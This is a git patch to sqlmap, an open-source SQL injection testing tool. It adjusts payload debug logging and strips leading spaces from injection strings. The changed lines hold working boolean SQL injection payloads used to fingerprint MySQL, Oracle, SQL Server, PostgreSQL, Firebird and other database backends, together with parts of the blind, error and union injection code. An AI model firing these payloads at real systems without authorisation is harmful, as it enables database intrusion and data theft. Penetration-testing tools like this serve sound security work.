From d3e7e89e60da472fd076c111d357630d0819a78f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 7 Nov 2010 21:18:09 +0000 Subject: [PATCH] major improvement with display of payloads (all payloads are displayed now) and removal of "pesky" spaces --- lib/core/agent.py | 4 ++-- lib/request/connect.py | 5 +++++ lib/request/inject.py | 3 --- lib/techniques/blind/inference.py | 3 --- lib/techniques/error/use.py | 3 --- lib/techniques/inband/union/use.py | 3 --- lib/utils/parenthesis.py | 4 ++-- plugins/dbms/access/fingerprint.py | 4 ++-- plugins/dbms/firebird/fingerprint.py | 14 +++++++------- plugins/dbms/maxdb/fingerprint.py | 4 ++-- plugins/dbms/mssqlserver/fingerprint.py | 8 ++++---- plugins/dbms/mysql/fingerprint.py | 4 ++-- plugins/dbms/oracle/fingerprint.py | 4 ++-- plugins/dbms/postgresql/fingerprint.py | 4 ++-- plugins/dbms/sqlite/fingerprint.py | 4 ++-- plugins/dbms/sybase/fingerprint.py | 6 +++--- 16 files changed, 35 insertions(+), 42 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 5826caf80..96200b978 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -36,8 +36,8 @@ class Agent: kb.misc.stop = randomStr(6) def payloadDirect(self, query): - if query.startswith(" AND "): - query = query.replace(" AND ", "SELECT ", 1) + if query.startswith("AND "): + query = query.replace("AND ", "SELECT ", 1) elif query.startswith(" UNION ALL "): query = query.replace(" UNION ALL ", "", 1) elif query.startswith("; "): diff --git a/lib/request/connect.py b/lib/request/connect.py index 0d52f68e6..2384c60cf 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -318,6 +318,11 @@ class Connect: value = agent.replacePayload(value, payload) + payload = agent.extractPayload(value) + if payload: + debugMsg = "payload: %s" % payload + logger.debug(debugMsg) + if place == "Cookie" and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value, False) value = urlEncodeCookieValues(value) diff --git a/lib/request/inject.py b/lib/request/inject.py index 42dbe9ad4..35b4b4576 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -399,9 +399,6 @@ def goStacked(expression, silent=False): query = agent.prefixQuery("; %s" % expression) query = agent.postfixQuery("%s;%s" % (query, comment)) - debugMsg = "query: %s" % query - logger.debug(debugMsg) - payload = agent.payload(newValue=query) page, _ = Request.queryPage(payload, content=True, silent=silent) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 22fb411d2..e313bcd8e 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -75,9 +75,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None else: expressionUnescaped = unescaper.unescape(expression) - debugMsg = "query: %s" % expressionUnescaped - logger.debug(debugMsg) - if length and not isinstance(length, int) and length.isdigit(): length = int(length) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 7639adbdd..e7ee248e0 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -64,9 +64,6 @@ def errorUse(expression, returnPayload=False): forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter)) - debugMsg = "query: %s" % forgedQuery - logger.debug(debugMsg) - payload = agent.payload(newValue=forgedQuery) result = Request.queryPage(payload, content=True) match = re.search('%s(?P.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE) diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py index c87ec8869..6a03d17b4 100644 --- a/lib/techniques/inband/union/use.py +++ b/lib/techniques/inband/union/use.py @@ -197,9 +197,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh query = agent.forgeInbandQuery(expression, nullChar=nullChar) payload = agent.payload(newValue=query) - debugMsg = "query: %s" % query - logger.debug(debugMsg) - # Perform the request resultPage, _ = Request.queryPage(payload, content=True) reqCount += 1 diff --git a/lib/utils/parenthesis.py b/lib/utils/parenthesis.py index dda984b67..04b1572e5 100644 --- a/lib/utils/parenthesis.py +++ b/lib/utils/parenthesis.py @@ -45,8 +45,8 @@ def checkForParenthesis(): randInt = randomInt() randStr = randomStr() - query = case.usage.prefix.format % eval(case.usage.prefix.params) +\ - case.usage.postfix.format % eval(case.usage.postfix.params) + query = case.usage.prefix.format % eval(case.usage.prefix.params) + query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params) payload = agent.payload(newValue=query) result = Request.queryPage(payload) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 8602e2a6a..a625959eb 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -161,14 +161,14 @@ class Fingerprint(GenericFingerprint): logMsg = "testing Microsoft Access" logger.info(logMsg) - payload = agent.fullPayload(" AND VAL(CVAR(1))=1") + payload = agent.fullPayload("AND VAL(CVAR(1))=1") result = Request.queryPage(payload) if result: logMsg = "confirming Microsoft Access" logger.info(logMsg) - payload = agent.fullPayload(" AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") + payload = agent.fullPayload("AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index edb02ba39..2dc68ce73 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -72,10 +72,10 @@ class Fingerprint(GenericFingerprint): def __sysTablesCheck(self): retVal = None table = ( - ("1.0", [" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]), - ("1.5", [" AND NULLIF(%d,%d) IS NULL", " AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]), - ("2.0", [" AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", " AND BIT_LENGTH(%d)>0", " AND CHAR_LENGTH(%d)>0"]), - ("2.1", [" AND BIN_XOR(%d,%d)=0", " AND PI()>0.%d", " AND RAND()<1.%d", " AND FLOOR(1.%d)>=0"]) + ("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]), + ("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]), + ("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]), + ("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"]) ) for i in xrange(len(table)): @@ -97,7 +97,7 @@ class Fingerprint(GenericFingerprint): def __dialectCheck(self): retVal = None if kb.dbms: - payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") + payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") result = Request.queryPage(payload) retVal = "dialect 3" if result else "dialect 1" return retVal @@ -116,14 +116,14 @@ class Fingerprint(GenericFingerprint): randInt = randomInt() - payload = agent.fullPayload(" AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt)) + payload = agent.fullPayload("AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt)) result = Request.queryPage(payload) if result: logMsg = "confirming Firebird" logger.info(logMsg) - payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") + payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index e105d7125..7278d90df 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -118,14 +118,14 @@ class Fingerprint(GenericFingerprint): randInt = randomInt() - payload = agent.fullPayload(" AND NOROUND(%d)=%d" % (randInt, randInt)) + payload = agent.fullPayload("AND NOROUND(%d)=%d" % (randInt, randInt)) result = Request.queryPage(payload) if result: logMsg = "confirming SAP MaxDB" logger.info(logMsg) - payload = agent.fullPayload(" AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL") + payload = agent.fullPayload("AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL") result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 5bbeda926..1e6399dcd 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -90,7 +90,7 @@ class Fingerprint(GenericFingerprint): result = True else: randInt = randomInt() - payload = agent.fullPayload(" AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt)) + payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt)) result = Request.queryPage(payload) if result: @@ -99,10 +99,10 @@ class Fingerprint(GenericFingerprint): for version in (0, 5, 8): randInt = randomInt() - query = " AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1)) + query = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1)) if conf.direct: - query = query.replace(" AND ", "SELECT 1 WHERE ", 1) + query = query.replace("AND ", "SELECT 1 WHERE ", 1) payload = agent.fullPayload(query) result = Request.queryPage(payload) @@ -124,7 +124,7 @@ class Fingerprint(GenericFingerprint): break else: - query = " AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1)) + query = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1)) payload = agent.fullPayload(query) result = Request.queryPage(payload) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 828f21af2..490712ee4 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -156,14 +156,14 @@ class Fingerprint(GenericFingerprint): logger.info(infoMsg) randInt = getUnicode(randomInt(1)) - payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()") + payload = agent.fullPayload("AND CONNECTION_ID()=CONNECTION_ID()") result = Request.queryPage(payload) if result: infoMsg = "confirming MySQL" logger.info(infoMsg) - payload = agent.fullPayload(" AND ISNULL(1/0)" if kb.injPlace != "URI" else " AND ISNULL(1 DIV 0)") + payload = agent.fullPayload("AND ISNULL(1/0)" if kb.injPlace != "URI" else "AND ISNULL(1 DIV 0)") result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 345847542..3f327038b 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -80,7 +80,7 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - payload = agent.fullPayload(" AND ROWNUM=ROWNUM") + payload = agent.fullPayload("AND ROWNUM=ROWNUM") result = Request.queryPage(payload) if result: @@ -92,7 +92,7 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)") + payload = agent.fullPayload("AND LENGTH(SYSDATE)=LENGTH(SYSDATE)") result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index bbc517bb4..12fccd336 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -86,14 +86,14 @@ class Fingerprint(GenericFingerprint): randInt = getUnicode(randomInt(1)) - payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt)) + payload = agent.fullPayload("AND %s::int=%s" % (randInt, randInt)) result = Request.queryPage(payload) if result: infoMsg = "confirming PostgreSQL" logger.info(infoMsg) - payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt)) + payload = agent.fullPayload("AND COALESCE(%s, NULL)=%s" % (randInt, randInt)) result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 4324e4fda..a1a85891b 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -80,14 +80,14 @@ class Fingerprint(GenericFingerprint): logMsg = "testing SQLite" logger.info(logMsg) - payload = agent.fullPayload(" AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") + payload = agent.fullPayload("AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") result = Request.queryPage(payload) if result: logMsg = "confirming SQLite" logger.info(logMsg) - payload = agent.fullPayload(" AND SQLITE_VERSION()=SQLITE_VERSION()") + payload = agent.fullPayload("AND SQLITE_VERSION()=SQLITE_VERSION()") result = Request.queryPage(payload) if not result: diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index 465420b7e..c38d6233b 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -79,14 +79,14 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - payload = agent.fullPayload(" AND tempdb_id()=tempdb_id()") + payload = agent.fullPayload("AND tempdb_id()=tempdb_id()") result = Request.queryPage(payload) if result: logMsg = "confirming Sybase" logger.info(logMsg) - payload = agent.fullPayload(" AND suser_id()=suser_id()") + payload = agent.fullPayload("AND suser_id()=suser_id()") result = Request.queryPage(payload) if not result: @@ -104,7 +104,7 @@ class Fingerprint(GenericFingerprint): for version in range(12, 16): randInt = randomInt() - query = " AND @@VERSION_NUMBER/1000=%d" % version + query = "AND @@VERSION_NUMBER/1000=%d" % version payload = agent.fullPayload(query) result = Request.queryPage(payload) if result: